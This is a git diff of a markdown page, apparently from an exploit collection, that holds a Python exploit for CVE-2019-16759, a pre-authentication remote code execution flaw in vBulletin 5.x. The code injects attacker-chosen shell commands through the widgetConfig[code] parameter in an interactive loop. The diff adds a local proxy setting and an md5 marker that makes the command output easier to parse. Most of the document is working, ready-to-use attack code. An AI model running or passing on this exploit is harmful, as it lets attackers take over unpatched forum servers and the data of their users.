diff --git a/CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit.md b/CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit.md
index 41d2bbb..1567da0 100644
--- a/CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit.md	
+++ b/CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit.md	
@@ -45,22 +45,27 @@ import sys
 if len(sys.argv) != 2:
     sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])
 
+proxies ={
+     "http":"http://127.0.0.1:8080/"
+}
 params = {"routestring":"ajax/render/widget_php"}
 
 while True:
      try:
-          cmd = raw_input("vBulletin$ ")
-          params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
-          r = requests.post(url = sys.argv[1], data = params)
-          if r.status_code == 200:
-               print r.text
+          cmd = raw_input(">>>Shell= ")
+          params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"');echo md5('vBulletin'); exit;"
+          r = requests.post(url = sys.argv[1], data = params, proxies=proxies)
+          if r.status_code == 200 or r.status_code ==403 and 'be4ea51d962be8308a0099ae1eb3ec63' in r.text:
+               print
+               print r.text.split('be4ea51d962be8308a0099ae1eb3ec63')[0]
           else:
                sys.exit("Exploit failed! :(")
      except KeyboardInterrupt:
           sys.exit("\nClosing shell...")
      except Exception, e:
           sys.exit(str(e))
+
 ```
 ### 复现截图  
 
-![vBulletin](img/41.png)
\ No newline at end of file
+![vBulletin](img/41.png)